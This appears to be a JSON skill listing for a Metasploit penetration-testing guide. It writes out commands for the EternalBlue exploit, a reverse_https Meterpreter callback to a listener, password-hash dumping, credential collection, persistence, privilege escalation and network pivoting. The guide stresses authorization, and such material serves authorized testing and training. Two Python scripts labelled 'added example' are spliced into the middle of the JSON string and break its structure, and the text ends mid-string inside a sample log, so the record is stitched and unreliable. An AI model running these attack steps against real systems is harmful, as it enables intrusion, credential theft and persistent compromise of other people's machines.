425,\n \"line_end\": 425\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 427,\n \"line_end\": 427\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 430,\n \"line_end\": 430\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 432,\n \"line_end\": 432\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 437,\n \"line_end\": 437\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 444,\n \"line_end\": 444\n }\n ]\n },\n {\n \"factor\": \"scripts\",\n \"evidence\": [\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 138,\n \"line_end\": 138\n },\n {\n \"file\": \"references/EXAMPLE.md\",\n \"line_start\": 137,\n \"line_end\": 137\n }\n ]\n }\n ],\n \"critical_findings\": [],\n \"high_findings\": [],\n \"medium_findings\": [],\n \"low_findings\": [],\n \"dangerous_patterns\": [],\n \"files_scanned\": 6,\n \"total_lines\": 2189,\n \"audit_model\": \"claude\",\n \"audited_at\": \"2026-01-16T15:47:47.339Z\"\n },\n \"content\": {\n \"user_title\": \"Metasploit Framework Penetration Testing Guide\",\n \"value_statement\": \"Learn to conduct authorized penetration tests using Metasploit Framework. 
This skill provides structured workflows for exploit development, vulnerability validation, and red team operations with proper authorization and compliance guidance.\",\n \"seo_keywords\": [\n \"metasploit penetration testing\",\n \"exploit development\",\n \"vulnerability validation\",\n \"red team operations\",\n \"meterpreter sessions\",\n \"credential harvesting\",\n \"privilege escalation\",\n \"lateral movement\",\n \"Claude\",\n \"Claude Code\"\n ],\n \"actual_capabilities\": [\n \"Metasploit Framework console initialization and workspace management for penetration testing engagements\",\n \"Vulnerability scanning and exploit module selection based on identified services\",\n \"Payload configuration including reverse HTTPS Meterpreter and listener setup\",\n \"Post-exploitation techniques for session management and system enumeration\",\n \"Privilege escalation guidance using local exploit suggester and getsystem\",\n \"MITRE ATT&CK framework mapping for TTPs documentation\"\n ],\n \"limitations\": [\n \"No automated exploit execution - provides documentation and guidance only\",\n \"Does not install or configure Metasploit Framework dependencies\",\n \"Requires separate Metasploit installation (not included in skill)\",\n \"Authorization and legal compliance are entirely the user's responsibility\"\n ],\n \"use_cases\": [\n {\n \"target_user\": \"Security professionals\",\n \"title\": \"Authorized penetration testing\",\n \"description\": \"Conduct structured penetration tests with proper scoping, authorization documentation, and compliance with security standards like PTES and OWASP.\"\n },\n {\n \"target_user\": \"Red team operators\",\n \"title\": \"Red team operations\",\n \"description\": \"Plan and execute red team exercises including exploit delivery, post-exploitation, and lateral movement assessments with operational security guidance.\"\n },\n {\n \"target_user\": \"Security researchers\",\n \"title\": \"Vulnerability research\",\n 
\"description\": \"Demonstrate exploit impact and validate vulnerabilities in controlled research environments with proper authorization and documentation.\"\n }\n ],\n \"prompt_templates\": [\n {\n \"title\": \"Quick Start\",\n \"scenario\": \"Initialize Metasploit\",\n \"prompt\": \"Show me how to initialize Metasploit Framework, start the PostgreSQL database, and verify connectivity for a penetration test engagement\"\n },\n {\n \"title\": \"Exploit Setup\",\n \"scenario\": \"Configure exploits\",\n \"prompt\": \"How do I select an appropriate exploit module in Metasploit, configure target options, set up a reverse HTTPS payload, and execute the exploit\"\n },\n {\n \"title\": \"Post-Exploitation\",\n \"scenario\": \"Gather session data\",\n \"prompt\": \"What are the essential Meterpreter commands to gather system information, enumerate processes, and identify privilege escalation opportunities after gaining a session\"\n },\n {\n \"title\": \"ATT&CK Mapping\",\n \"scenario\": \"Map techniques\",\n \"prompt\": \"Map common Metasploit activities like initial access, credential access, and lateral movement to specific MITRE ATT&CK techniques and tactics\"\n }\n ],\n \"output_examples\": [\n {\n \"input\": \"How do I set up a Metasploit workspace for an engagement and import Nmap scan results?\",\n \"output\": [\n \"Create a dedicated workspace: workspace -a \u003cengagement-name>\",\n \"Import Nmap results: db_import /path/to/nmap-scan.xml\",\n \"Verify hosts: hosts command\",\n \"View services: services command\",\n \"Recommended Nmap flags for Metasploit: db_nmap -sV -sC -O \u003ctarget>\"\n ]\n },\n {\n \"input\": \"What post-exploitation commands should I run first after getting a Meterpreter session?\",\n \"output\": [\n \"Verify session: getuid (shows current user)\",\n \"System info: sysinfo (OS, architecture)\",\n \"Check privileges: getprivs (available permissions)\",\n \"Network config: ipconfig, route (routing table)\",\n \"Process list: ps (running 
processes for migration)\",\n \"Check AV: run post/windows/gather/enum_av_excluded\"\n ]\n },\n {\n \"input\": \"How do I configure a reverse HTTPS Meterpreter payload for a Windows target?\",\n \"output\": [\n \"Set payload: set PAYLOAD windows/x64/meterpreter/reverse_https\",\n \"Configure listener host: set LHOST \u003cyour-ip>\",\n \"Configure listener port: set LPORT 443\",\n \"Verify options: show options\",\n \"Start handler: use exploit/multi/handler then run\"\n ]\n }\n ],\n \"best_practices\": [\n \"Always verify written authorization from asset owners before conducting any penetration testing activities on systems\",\n \"Document all commands executed, findings discovered, and evidence collected for compliance reporting and legal protection\",\n \"Map activities to MITRE ATT&CK framework to understand adversary techniques and improve detection capabilities\",\n \"Close all sessions cleanly and remove exploitation artifacts after completing the assessment engagement\"\n ],\n \"anti_patterns\": [\n \"Testing systems without explicit written authorization - this is illegal and may result in criminal prosecution\",\n \"Failing to document scope boundaries during engagement - may lead to compliance violations and legal liability\",\n \"Leaving active sessions or persistence mechanisms in place after assessment - always clean up all Metasploit artifacts\"\n ],\n \"faq\": [\n {\n \"question\": \"What dependencies are required for Metasploit?\",\n \"answer\": \"Metasploit requires PostgreSQL for database connectivity, Nmap for reconnaissance integration, and the metasploit-framework package. Kali Linux includes Metasploit preconfigured.\"\n },\n {\n \"question\": \"Does this skill execute exploits automatically?\",\n \"answer\": \"No, this skill provides documentation and guidance only. 
Actual exploit execution requires separate Metasploit installation and is performed by the user.\"\n },\n {\n \"question\": \"How do I map Metasploit activities to MITRE ATT&CK?\",\n \"answer\": \"Use the ATT&CK mapping section which documents TTPs: Initial Access (T1190), Execution (T1059), Persistence (T1547), Privilege Escalation (T1068), Credential Access (T1003), and Lateral Movement (T1021).\"\n },\n {\n \"question\": \"What authorization is required for penetration testing?\",\n \"answer\": \"Written authorization from the asset owner is mandatory. Document scope, testing windows, target systems, and emergency contacts before starting any testing activities.\"\n },\n {\n \"question\": \"How do I handle discovered credentials during testing?\",\n \"answer\": \"Document credentials found but do not access systems beyond scope. Follow engagement rules for data handling. Report findings per escalation procedures immediately.\"\n },\n {\n \"question\": \"How is this different from automated vulnerability scanners?\",\n \"answer\": \"Metasploit provides exploitation capabilities rather than just detection. This enables validation of vulnerability impact and realistic attack simulation. 
Use with appropriate authorization.\"\n }\n ]\n },\n \"file_structure\": [\n {\n \"name\": \"assets\",\n \"type\": \"dir\",\n \"path\": \"assets\",\n \"children\": [\n {\n \"name\": \"ci-config-template.yml\",\n \"type\": \"file\",\n \"path\": \"assets/ci-config-template.yml\",\n \"lines\": 358\n },\n {\n \"name\": \"rule-template.yaml\",\n \"type\": \"file\",\n \"path\": \"assets/rule-template.yaml\",\n \"lines\": 356\n }\n ]\n },\n {\n \"name\": \"references\",\n \"type\": \"dir\",\n \"path\": \"references\",\n \"children\": [\n {\n \"name\": \"EXAMPLE.md\",\n \"type\": \"file\",\n \"path\": \"references/EXAMPLE.md\",\n \"lines\": 551\n },\n {\n \"name\": \"WORKFLOW_CHECKLIST.md\",\n \"type\": \"file\",\n \"path\": \"references/WORKFLOW_CHECKLIST.md\",\n \"lines\": 254\n }\n ]\n },\n {\n \"name\": \"SKILL.md\",\n \"type\": \"file\",\n \"path\": \"SKILL.md\",\n \"lines\": 456\n }\n ]\n}\n","content_type":"application/json; charset=utf-8","language":"json","size":29293,"content_sha256":"f20ccdff57cadb8b86506da199425c7be334c23d880923c49fdf1c6149018942"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Metasploit Framework Penetration Testing","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Overview","type":"text"}]},{"type":"paragraph","content":[{"text":"Metasploit Framework is the industry-standard platform for penetration testing, vulnerability validation, and exploit development. This skill provides structured workflows for authorized offensive security operations including exploitation, post-exploitation, and payload delivery.","type":"text"}]},{"type":"paragraph","content":[{"text":"IMPORTANT","type":"text","marks":[{"type":"strong"}]},{"text":": This skill is for AUTHORIZED security testing only. 
Always ensure proper authorization, scoping documents, and legal compliance before conducting penetration testing activities.","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Quick Start","type":"text"}]},{"type":"paragraph","content":[{"text":"Initialize Metasploit console and verify database connectivity:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Start PostgreSQL database (required for workspace management)\nsudo systemctl start postgresql\n\n# Initialize Metasploit database\nmsfdb init\n\n# Launch Metasploit console\nmsfconsole\n\n# Verify database connection\nmsf6 > db_status","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Core Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Penetration Testing Workflow","type":"text"}]},{"type":"paragraph","content":[{"text":"Progress: [ ] 1. Verify authorization and scope [ ] 2. Configure workspace and target enumeration [ ] 3. Identify and select appropriate exploits [ ] 4. Configure payload and exploit options [ ] 5. Execute exploitation with proper documentation [ ] 6. Conduct post-exploitation activities (if authorized) [ ] 7. Document findings with impact assessment [ ] 8. Clean up artifacts and sessions","type":"text"}]},{"type":"paragraph","content":[{"text":"Work through each step systematically. Check off completed items.","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"1. 
Authorization Verification","type":"text"}]},{"type":"paragraph","content":[{"text":"CRITICAL","type":"text","marks":[{"type":"strong"}]},{"text":": Before any testing activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm written authorization from asset owner","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Review scope document for in-scope targets","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Verify IP ranges and systems authorized for testing","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Confirm allowed testing windows and blackout periods","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Document point of contact for emergency escalation","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"2. Workspace Setup","type":"text"}]},{"type":"paragraph","content":[{"text":"Create isolated workspace for engagement:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > workspace -a \u003cengagement-name>\nmsf6 > workspace \u003cengagement-name>\nmsf6 > db_nmap -sV -sC -O \u003ctarget-ip-range>","type":"text"}]},{"type":"paragraph","content":[{"text":"Import existing reconnaissance data:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > db_import /path/to/nmap-scan.xml\nmsf6 > hosts\nmsf6 > services","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"3. 
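The workspace setup above imports whatever the scanner returned, so an Nmap run that drifted past the authorized ranges would put out-of-scope hosts into the engagement database. The following Python script is an added example, not code from this skill or from Metasploit: it parses Nmap XML, prunes every host outside the scope CIDRs, and writes an msfconsole resource script that creates the workspace and imports only the pruned file. The XML, the workspace name acme-internal and the scope entry 10.10.20.0/24 are constructed for the example.

```python
"""Scope-gated Nmap import for a Metasploit workspace (added example)."""
import ipaddress
import xml.etree.ElementTree as ET

# Constructed Nmap XML: two hosts inside the assumed scope 10.10.20.0/24 and one
# host (192.168.1.9) the scan touched but the scope document does not cover.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.10.20.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
    </ports></host>
  <host><status state="up"/><address addr="10.10.20.7" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http" product="Apache httpd"/></port>
      <port protocol="tcp" portid="22"><state state="filtered"/><service name="ssh"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.1.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports></host>
</nmaprun>"""

AUTHORIZED_SCOPE = ["10.10.20.0/24"]  # assumed entry copied from the scope document


def in_scope(ip, scope_cidrs):
    """True if ip lies inside any authorized CIDR."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(c, strict=False) for c in scope_cidrs)


def host_ip(host):
    """First IPv4 (else IPv6) address of an Nmap <host> element, or None."""
    for kind in ("ipv4", "ipv6"):
        addr = host.find(f"address[@addrtype='{kind}']")
        if addr is not None:  # an Element with no children is falsy, so test for None
            return addr.get("addr")
    return None


def parse_nmap_hosts(xml_text):
    """Return {ip: [(port, service_name), ...]} keeping open ports only."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        ip = host_ip(host)
        if ip is None:
            continue
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            open_ports.append((int(port.get("portid")), svc.get("name", "") if svc is not None else ""))
        hosts[ip] = open_ports
    return hosts


def prune_to_scope(xml_text, scope_cidrs):
    """Remove every <host> outside scope; return (pruned_xml, removed_ips)."""
    root = ET.fromstring(xml_text)
    removed = []
    for host in list(root.findall("host")):
        ip = host_ip(host)
        if ip is None or not in_scope(ip, scope_cidrs):
            root.remove(host)
            removed.append(ip or "<host without address>")
    return ET.tostring(root, encoding="unicode"), removed


def build_import_rc(workspace, pruned_xml_path):
    """msfconsole resource script: new workspace, import of the pruned scan, summary listing."""
    lines = [
        f"workspace -a {workspace}",
        f"workspace {workspace}",
        f"db_import {pruned_xml_path}",
        "hosts",
        "services",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    pruned_xml, dropped = prune_to_scope(SAMPLE_NMAP_XML, AUTHORIZED_SCOPE)
    with open("scan-inscope.xml", "w") as fh:
        fh.write(pruned_xml)
    with open("import.rc", "w") as fh:
        fh.write(build_import_rc("acme-internal", "scan-inscope.xml"))
    with open("dropped-out-of-scope.txt", "w") as fh:
        fh.write("\n".join(dropped) + "\n")
    print(f"dropped {len(dropped)} out-of-scope host(s): {dropped}")
```

Run it, then `msfconsole -q -r import.rc`; the dropped hosts land in a sidecar file so the scope deviation is recorded in the engagement log rather than silently discarded.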
Exploit Selection","type":"text"}]},{"type":"paragraph","content":[{"text":"Search for relevant exploits based on enumerated services:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > search type:exploit platform:windows \u003cservice-name>\nmsf6 > search cve:\u003ccve-id>\nmsf6 > search eternalblue","type":"text"}]},{"type":"paragraph","content":[{"text":"Evaluate exploit suitability:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Reliability Ranking","type":"text","marks":[{"type":"strong"}]},{"text":": Excellent > Great > Good > Normal > Average","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Stability","type":"text","marks":[{"type":"strong"}]},{"text":": Check crash potential","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target Compatibility","type":"text","marks":[{"type":"strong"}]},{"text":": Verify OS version and architecture","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Required Credentials","type":"text","marks":[{"type":"strong"}]},{"text":": Determine if authentication needed","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"4. 
Exploit Configuration","type":"text"}]},{"type":"paragraph","content":[{"text":"Configure selected exploit module:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"msf6 > use exploit/windows/smb/ms17_010_eternalblue\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > show options\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS \u003ctarget-ip>\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set RPORT 445\n\n# Configure payload\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST \u003clistener-ip>\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 443\n\n# Validate configuration\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > show options\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > check","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"5. Exploitation Execution","type":"text"}]},{"type":"paragraph","content":[{"text":"Execute exploit with logging:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enable logging\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > spool /path/to/logs/engagement-\u003cdate>.log\n\n# Run exploit\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > exploit\n\n# Or run without auto-interaction\nmsf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j","type":"text"}]},{"type":"paragraph","content":[{"text":"Exploitation outcomes","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session opened","type":"text","marks":[{"type":"strong"}]},{"text":": Successful exploitation, proceed to post-exploitation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit 
failed","type":"text","marks":[{"type":"strong"}]},{"text":": Review target compatibility, try alternative exploits","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Target not vulnerable","type":"text","marks":[{"type":"strong"}]},{"text":": Document finding, move to next target","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Service crash","type":"text","marks":[{"type":"strong"}]},{"text":": Document stability issue, attempt service restoration if authorized","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"6. Post-Exploitation (Authorized Activities Only)","type":"text"}]},{"type":"paragraph","content":[{"text":"Once session established, conduct authorized post-exploitation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# List active sessions\nmsf6 > sessions -l\n\n# Interact with session\nmsf6 > sessions -i \u003csession-id>\n\n# Gather system information\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getprivs\n\n# Check network configuration\nmeterpreter > ipconfig\nmeterpreter > route\n\n# Enumerate running processes\nmeterpreter > ps\n\n# Check security controls\nmeterpreter > run post/windows/gather/enum_av_excluded\nmeterpreter > run post/windows/gather/enum_logged_on_users","type":"text"}]},{"type":"paragraph","content":[{"text":"Common post-exploitation modules","type":"text","marks":[{"type":"strong"}]},{"text":":","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/gather/hashdump","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Extract password hashes (requires SYSTEM privileges)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/multi/recon/local_exploit_suggester","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Identify 
privilege escalation opportunities","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/gather/credentials/credential_collector","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Gather stored credentials","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"post/windows/manage/persistence_exe","type":"text","marks":[{"type":"code_inline"}]},{"text":" - Establish persistence (if explicitly authorized)","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"7. Privilege Escalation","type":"text"}]},{"type":"paragraph","content":[{"text":"If authorized for privilege escalation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Identify escalation vectors\nmeterpreter > run post/multi/recon/local_exploit_suggester\n\n# Migrate to stable process\nmeterpreter > ps\nmeterpreter > migrate \u003cstable-process-pid>\n\n# Attempt privilege escalation\nmeterpreter > getsystem\nmeterpreter > getuid","type":"text"}]},{"type":"paragraph","content":[{"text":"Manual privilege escalation workflow:","type":"text"}]},{"type":"ordered_list","attrs":{"order":1,"listStyle":"number"},"content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Background current session: ","type":"text"},{"text":"background","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Select escalation module: ","type":"text"},{"text":"use exploit/windows/local/\u003cescalation-module>","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Set session: ","type":"text"},{"text":"set SESSION \u003csession-id>","type":"text","marks":[{"type":"code_inline"}]}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Run exploit: 
","type":"text"},{"text":"exploit","type":"text","marks":[{"type":"code_inline"}]}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"8. Lateral Movement","type":"text"}]},{"type":"paragraph","content":[{"text":"For authorized internal penetration tests:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Enumerate the internal network from the compromised host\nmeterpreter > run post/windows/gather/arp_scanner RHOSTS=\u003cinternal-subnet>\n\n# Pivot through compromised host (the autoroute Meterpreter script is deprecated; use the post module)\nmeterpreter > run post/multi/manage/autoroute CMD=add SUBNET=\u003cinternal-subnet> NETMASK=255.255.255.0\nmeterpreter > background\n\n# Scanner modules run from the framework prompt and reach the subnet through the new route\nmsf6 > use auxiliary/scanner/smb/smb_version\nmsf6 auxiliary(scanner/smb/smb_version) > set RHOSTS \u003cinternal-subnet>/24\nmsf6 auxiliary(scanner/smb/smb_version) > run\n\n# Use compromised host as proxy (serves SOCKS5 by default; the VERSION option selects 4a or 5)\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j","type":"text"}]},{"type":"paragraph","content":[{"text":"Configure proxychains for pivoting:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Edit /etc/proxychains4.conf; the SOCKS version here must match the socks_proxy VERSION option\nsocks5 127.0.0.1 1080\n\n# Run tools through pivot (full-connect scans only: SYN scans and ICMP ping cannot traverse SOCKS)\nproxychains nmap -sT -Pn \u003cinternal-target>","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Security Considerations","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Authorization & Legal Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Written Authorization","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain signed penetration testing agreement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Scope Adherence","type":"text","marks":[{"type":"strong"}]},{"text":": Only test explicitly authorized systems and networks","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data Protection","type":"text","marks":[{"type":"strong"}]},{"text":": Handle discovered data per the engagement's rules of 
engagement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Incident Response","type":"text","marks":[{"type":"strong"}]},{"text":": Immediately report critical findings per escalation procedures","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Evidence Handling","type":"text","marks":[{"type":"strong"}]},{"text":": Maintain chain of custody for forensic evidence","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Operational Security","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Callback Infrastructure","type":"text","marks":[{"type":"strong"}]},{"text":": Use dedicated, authorized callback servers","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Attribution Prevention","type":"text","marks":[{"type":"strong"}]},{"text":": Avoid personal infrastructure or identifiable indicators","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Traffic Encryption","type":"text","marks":[{"type":"strong"}]},{"text":": Use encrypted payloads (HTTPS, DNS tunneling)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Artifact Cleanup","type":"text","marks":[{"type":"strong"}]},{"text":": Remove exploitation artifacts post-engagement","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Session Management","type":"text","marks":[{"type":"strong"}]},{"text":": Close sessions cleanly to avoid detection alerts","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Audit Logging","type":"text"}]},{"type":"paragraph","content":[{"text":"Log all penetration testing activities:","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Timestamp of exploitation 
attempts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Source and destination systems","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Exploit modules and payloads used","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Commands executed in sessions","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Data accessed or exfiltrated","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Privilege escalation attempts","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Lateral movement actions","type":"text"}]}]}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Compliance","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PTES","type":"text","marks":[{"type":"strong"}]},{"text":": Penetration Testing Execution Standard compliance","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"OWASP","type":"text","marks":[{"type":"strong"}]},{"text":": Alignment with application security testing methodology","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"MITRE ATT&CK","type":"text","marks":[{"type":"strong"}]},{"text":": Map TTPs to ATT&CK framework for threat modeling","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"PCI DSS 11.3 / 11.4","type":"text","marks":[{"type":"strong"}]},{"text":": Penetration testing for payment card environments (requirement 11.3 in PCI DSS v3.2.1, renumbered 11.4 in v4.0)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"SOC 2","type":"text","marks":[{"type":"strong"}]},{"text":": Security testing for service organization controls","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Common 
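The audit-logging list above describes the record each action should leave behind, and the ATT&CK rows this page gives (T1190, T1059, T1547, T1068, T1003, T1021, T1005) are the tags those records should carry. The following Python parser is an added example, not code from this skill or from Metasploit: it reads a console transcript in which each line was prefixed with a timestamp (a constructed layout; a raw spool file or ~/.msf4/history needs PROMPT_RE adjusted), tracks the module, RHOSTS, PAYLOAD and LHOST in effect, takes source and destination from the "Meterpreter session N opened (...)" banner Metasploit prints, and tags each action with the page's ATT&CK row. The log lines are constructed; grouping autoroute under lateral movement follows this page's own section layout.

```python
"""Audit records with ATT&CK tags from an msfconsole transcript (added example)."""
import re
from collections import Counter

# ATT&CK rows exactly as this page maps them: key -> (tactic, technique ID)
ATTACK = {
    "initial_access":       ("Initial Access", "T1190"),
    "execution":            ("Execution", "T1059"),
    "persistence":          ("Persistence", "T1547"),
    "privilege_escalation": ("Privilege Escalation", "T1068"),
    "credential_access":    ("Credential Access", "T1003"),
    "lateral_movement":     ("Lateral Movement", "T1021"),
    "collection":           ("Collection", "T1005"),
}
# Commands that act on the target; set/use/show/background are recorded but untagged.
ACTIONS = {"exploit", "run", "getsystem", "download", "shell", "execute"}

PROMPT_RE = re.compile(
    r"^\[(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\] "
    r"(?:msf6(?: (?P<kind>\w+)\((?P<mod>[^)]+)\))?|(?P<met>meterpreter)) > (?P<cmd>.+)$")
# Metasploit's own session banner carries the listener socket and the victim socket.
SESSION_RE = re.compile(
    r"Meterpreter session (?P<sid>\d+) opened \((?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)\)"
    r" at (?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)")

# Constructed transcript: a timestamp was prepended to every console line when the
# spool file was written (assumed layout).
SAMPLE_LOG = r"""[2026-01-16 15:40:02] msf6 > workspace acme-internal
[2026-01-16 15:40:10] msf6 > use exploit/windows/smb/ms17_010_eternalblue
[2026-01-16 15:40:15] msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.20.5
[2026-01-16 15:40:18] msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_https
[2026-01-16 15:40:21] msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.20.200
[2026-01-16 15:40:30] msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Meterpreter session 1 opened (10.10.20.200:443 -> 10.10.20.5:49213) at 2026-01-16 15:40:44 +0000
[2026-01-16 15:41:02] meterpreter > getsystem
[2026-01-16 15:41:10] meterpreter > run post/windows/gather/hashdump
[2026-01-16 15:41:40] meterpreter > download C:\Users\svc_backup\Desktop\notes.txt
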